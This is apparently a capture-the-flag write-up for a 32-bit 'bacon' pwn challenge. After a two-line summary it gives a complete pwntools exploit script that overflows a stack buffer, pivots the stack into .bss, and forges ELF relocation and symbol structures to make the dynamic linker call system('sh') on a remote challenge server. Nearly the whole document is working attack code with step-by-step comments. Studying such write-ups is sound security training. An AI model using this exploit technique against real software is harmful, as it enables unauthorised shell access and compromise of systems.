Tags: pwn 

Rating:

x86 binary - no PIE - simple buffer overflow - NX - no canary - very few useful gadgets

stack pivot, then use `ret2dlresolve` to call `system("sh")`

Exploit from https://gist.github.com/ricardo2197/8c7f6f5b8950ed6771c1cd3a116f7e62

```
from pwn import *
# Writeup exploit for the "bacon" challenge: overflow a stack buffer, pivot the
# stack into .bss, then ret2dlresolve with a forged Elf32_Rel/Elf32_Sym pair so
# the dynamic linker itself resolves "system" (no libc leak needed).
# Every address below is hard-coded: this only works because the binary is
# non-PIE and has no stack canary (see the writeup header); either mitigation
# would break the chain.
# NOTE(review): written for Python 2 - str payloads are concatenated with p32()
# output and `/` on line "index_sym" is integer division; under Python 3 this
# script raises TypeError and needs porting.
# r = process("./bacon")
r = remote("jh2i.com", 50032)
# gdb.attach(r, "bp 0x08049291")
_elf = ELF("./bacon")
resolver = 0x8049030 #push link_map and call dl_resolve (presumably PLT0 - confirm in the binary)
buf = 0x804cf10 #controllable area (.bss): writable and at a fixed address (no PIE)
leave_ret = 0x08049126 #gadget: leave ; ret
'''
0x00000005 (STRTAB) 0x80482ec
0x00000006 (SYMTAB) 0x804820c
0x00000017 (JMPREL) 0x8048408
'''
# Dynamic-section addresses (from the readelf output above), used to compute
# the offsets the resolver will add to them.
SYMTAB = 0x804820c
STRTAB = 0x80482ec
JMPREL = 0x8048408

# Stage 1: pivoting the stack and calling read(0, buf, 0x80) for the rest of the payload.
# Layout after the 1032 filler bytes: saved ebp = buf, return address = read@plt,
# read's own return address = leave_ret, then read's three arguments.
# When read returns, leave;ret does esp = ebp (= buf), pops the fake ebp stored
# at buf+0, and returns to the value at buf+4 - i.e. into stage 2 below.
buffer = ""
buffer += "A"*1032
buffer += p32(buf) #stack pivoting. (esp = buff)
buffer += p32(_elf.plt["read"]) + p32(leave_ret) + p32(0) + p32(buf) + p32(0x80)
buffer += "A"*(0x42c-len(buffer)-1) # pad to 0x42c-1; sendline() adds the final newline - presumably the size of the vulnerable read, verify against the binary

# Compute offsets and forged structures
forged_ara = buf + 0x14 # the forged Elf32_Rel lands at buf+0x14 (see stage 2 layout)
rel_offset = forged_ara - JMPREL # resolver takes a JMPREL-relative offset; this points past the real table into .bss
elf32_sym = forged_ara + 0x8 #size of elf32_sym -- actually sizeof(Elf32_Rel): the forged Elf32_Sym follows the 8-byte Elf32_Rel

# The resolver indexes SYMTAB by (r_info >> 8) * sizeof(Elf32_Sym) = index * 0x10,
# so the forged symbol must sit at a 0x10-aligned distance from SYMTAB.
align = 0x10 - ((elf32_sym - SYMTAB) % 0x10) #align to 0x10

elf32_sym = elf32_sym + align
index_sym = (elf32_sym - SYMTAB) / 0x10 # Python 2 integer division (a float under Python 3)

r_info = (index_sym << 8) | 0x7 # symbol index in the high 24 bits, type 7 = R_386_JMP_SLOT

# Elf32_Rel: r_offset = read's GOT slot (where the resolved address gets written), r_info as above.
elf32_rel = p32(_elf.got['read']) + p32(r_info)
st_name = (elf32_sym + 0x10) - STRTAB # the "system\0" string sits right after the 0x10-byte Elf32_Sym; expressed as a STRTAB-relative offset
# Elf32_Sym: st_name, st_value=0, st_size=0, then st_info=0x12 (STB_GLOBAL<<4 | STT_FUNC),
# st_other=0, st_shndx=0 packed into the last dword.
elf32_sym_struct = p32(st_name) + p32(0) + p32(0) + p32(0x12)

# Stage 2 (read into buf): the dl-resolve hack - offsets are relative to buf.
buffer2 = 'AAAA' #buf+0x00: fake ebp (popped by leave_ret)
buffer2 += p32(resolver) #buf+0x04: ret-to dl_resolve
buffer2 += p32(rel_offset) #buf+0x08: JMPREL + offset = forged Elf32_Rel
buffer2 += 'AAAA' #buf+0x0c: fake return address for system()
buffer2 += p32(buf+100) #buf+0x10: system() parameter -> "sh" written at buf+100 below
buffer2 += elf32_rel # (buf+0x14)
buffer2 += 'A' * align # pad so the Elf32_Sym is 0x10-aligned relative to SYMTAB
buffer2 += elf32_sym_struct # (buf+0x20)
buffer2 += "system\x00" # referenced by st_name
p = (100 - len(buffer2))
buffer2 += 'A' * p #padding up to buf+100
buffer2 += "sh\x00" # buf+100: argument string
p = (0x80 - len(buffer2))
buffer2 += "A" * p #total read size (matches the 0x80 passed to read in stage 1)

r.sendline(buffer)
context.log_level = "debug" # pwntools debug logging for the second send only
r.sendline(buffer2)
r.interactive()
```